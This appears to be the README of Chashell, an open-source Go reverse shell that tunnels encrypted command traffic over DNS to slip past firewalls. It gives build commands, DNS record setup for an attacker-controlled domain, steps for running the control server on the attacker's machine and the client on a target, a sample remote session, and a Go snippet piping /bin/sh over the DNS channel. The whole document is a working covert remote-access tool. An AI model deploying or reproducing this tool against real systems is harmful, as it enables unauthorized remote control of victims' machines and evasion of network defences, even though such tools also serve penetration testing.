Reverse Shell over DNS
Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
It comes with a multi-client control server, named chaserv
.
Communication security
Every packet is encrypted using symmetric cryptography (XSalsa20 + Poly1305), with a shared key between the client and the server.
We plan to implement asymmetric cryptography in the future.
Protocol
Chashell communicates using Protocol Buffers serialized messages. For reference, the Protocol Buffers structure (.proto
file) is available in the proto
folder.
Here is a (simplified) communication chart :
Keep in mind that every packet is encrypted, hex-encoded and then packed for DNS transportation.
Supported systems
Chashell should work with any desktop system (Windows, Linux, Darwin, BSD variants) that is supported by the Go compiler.
We tested those systems and it works without issues :
- Windows (386/amd64)
- Linux (386/amd64/arm64)
- OS X (386/amd64)
How to use Chaserv/Chashell
Building
Make sure the GOPATH environment variable is correctly configured before running these commands.
Build all the binaries (adjust the domain_name and the encryption_key to your needs):
$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.sysdream.com
$ make build-all
Build for a specific platform:
$ make build-all OSARCH="linux/arm"
Build only the server:
$ make build-server
Build only the client (chashell itself):
$ make build-client
DNS Settings
- Buy and configure a domain name of your choice (preferably short).
- Set a DNS record like this :
chashell 300 IN A [SERVERIP]
c 300 IN NS chashell.[DOMAIN].
Usage
Basically, on the server side (attacker's computer), you must use the chaserv
binary. For the client side (i.e the target), use the chashell
binary.
So:
- Run
chaserv
on the control server. - Run
chashell
on the target computer.
The client should now connect back to chaserv
:
[n.chatelain]$ sudo ./chaserv
chashell >>> New session : 5c54404419e59881dfa3a757
chashell >>> sessions 5c54404419e59881dfa3a757
Interacting with session 5c54404419e59881dfa3a757.
whoami
n.chatelain
ls /
bin
boot
dev
[...]
usr
var
Use the sessions [sessionid]
command to interact with a client.
When interacting with a session, you can use the background
session in order to return to the chashell
prompt.
Use the exit
command to close chaserv
.
Implement your own
The chashell/lib/transport
library is compatible with the io.Reader
/ io.Writer
interface. So, implementing a reverse shell is as easy as :
cmd := exec.Command("/bin/sh") dnsTransport := transport.DNSStream(targetDomain, encryptionKey) cmd.Stdout = dnsTransport cmd.Stderr = dnsTransport cmd.Stdin = dnsTransport cmd.Run()
Debugging
For more verbose messages, add TAGS=debug
at the end of the make command.
To Do
- Implement asymmetric cryptography (Curve25519, XSalsa20 and Poly1305)
- Retrieve the host name using the
InfoPacket
message. - Create a proxy/relay tool in order to tunnel TCP/UDP streams (Meterpreter over DNS !).
- Better error handling.
- Get rid of dependencies.
Credits
- Nicolas Chatelain <n.chatelain -at- sysdream.com>